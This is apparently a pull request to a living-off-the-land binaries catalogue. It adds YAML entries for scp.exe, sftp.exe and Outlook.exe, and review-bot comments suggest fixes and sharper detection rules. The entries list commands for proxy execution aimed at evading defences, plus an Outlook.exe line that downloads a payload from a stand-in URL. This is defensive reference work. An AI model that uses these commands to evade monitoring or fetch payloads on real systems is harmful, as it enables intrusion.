Add scp.exe for execute download upload and copy #265

Open
wants to merge 9 commits into
base: master
42 changes: 42 additions & 0 deletions yml/OSBinaries/scp.yml
@@ -0,0 +1,42 @@
---
Name: scp.exe
Description: Secure Copy Protocol
Author: Nir Chako
Created: 2022-11-14
Commands:
- Command: 'scp -S "C:\windows\system32\notepad.exe" file.txt localhost:'
Description: Execute notepad.exe with scp.exe as parent process
Usecase: Use scp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
- Command: "scp <ssh-username>@192.168.187.128:<path_of_file_to_download> <path_to_save_file>"
Description: Download file with scp.exe from an SSH server
Usecase: Use scp.exe to download file from an SSH server. If needed, you will be asked to submit a password for the SSH session.
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "scp <path_of_local_file_to_upload> <ssh-username>@192.168.187.128:<path_to_save_file>"
Description: Upload file with scp.exe to an SSH server
Usecase: Use scp.exe to Upload file from the local machine to remote SSH server. If needed, you will be asked to submit a password for the SSH session.
Category: Upload
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
- Command: "scp <source_file_path> <copy_destination_path>"
Description: Copy file with scp.exe to a local path
Usecase: Use scp.exe to Copy a file from one location to another.
Category: Copy
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\scp.exe
Detection:
- IOC: scp.exe spawning unexpected processes
- IOC: Suspicious SSH internet/network traffic
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
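Review bot: the local Copy entry (`scp <source_file_path> <copy_destination_path>`) is tagged `MitreID: T1105`, but T1105 is Ingress Tool Transfer and that command moves nothing over the network, so the ID does not fit `Category: Copy`; use the technique the repository's other Copy entries map to. Two smaller points: the Download and Upload commands hard-code `192.168.187.128` while every other variable part is an angle-bracket placeholder, so a `<ssh-server>` placeholder would be consistent; and the Detection list would be more actionable if it named the observable from the first command, e.g. `scp.exe` launched with a `-S` argument that points to anything other than `ssh.exe`, rather than only "spawning unexpected processes".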
20 changes: 20 additions & 0 deletions yml/OSBinaries/sftp.yml
@@ -0,0 +1,20 @@
---
Name: sftp.exe
Description: SSH File Transfer Protocol
Author: Nir Chako
Created: 2022-11-06
Commands:
- Command: "sftp -D c:\\windows\\system32\\notepad.exe"
Description: Execute notepad.exe with sftp.exe as parent process
Usecase: Use sftp.exe as a proxy binary to evade defensive counter-measures
Category: Execute
Privileges: User
MitreID: T1202
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: c:\windows\system32\OpenSSH\sftp.exe
Detection:
- IOC: sftp.exe spawning unexpected processes
Acknowledgement:
- Person: 'Nir Chako (Pentera)'
Handle: '@C_h4ck_0'
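Review bot: the Detection IOC "sftp.exe spawning unexpected processes" does not name what makes the listed command observable; the `-D` argument (the path of the sftp-server program to run) is passed on the command line, so a rule on `sftp.exe` started with `-D` pointing to a path other than the OpenSSH `sftp-server` binary is a far more specific indicator than a generic child-process check. Also, the entry has no `Resources:` section; if a write-up or reference for this behaviour exists, add a link there.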
34 changes: 34 additions & 0 deletions yml/OtherMSBinaries/Outlook.yml
@@ -0,0 +1,34 @@
---
Name: Outlook.exe
Description: Microsoft Office component
Author: Nir Chako
Created: 2022-11-08
Commands:
- Command: Outlook.exe https://example.com/payload
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Full_Path:
- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office16\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office15\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office14\Outlook.exe
- Path: C:\Program Files (x86)\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
- Path: C:\Program Files\Microsoft Office\Office12\Outlook.exe
Detection:
- IOC: Suspicious Office application internet/network traffic
Acknowledgement:
- Person: Nir Chako (Pentera)
Handle: '@C_h4ck_0'
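Review bot: the `Full_Path` list contains a duplicate, `C:\Program Files\Microsoft Office\Office12\Outlook.exe` appears on two consecutive lines, so one of them should be dropped. The Description "Microsoft Office component" is less specific than the other entries' descriptions; "Microsoft Outlook email client" would tell a reader what the binary is. On Detection, the Usecase already names where the download lands (`%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE`), so an IOC such as `Outlook.exe` launched with a URL as its only argument, or `Outlook.exe` writing an executable or script under that INetCache path, would be more actionable than "Suspicious Office application internet/network traffic" alone. Minor: the `Person` value is unquoted here but quoted in the other two files.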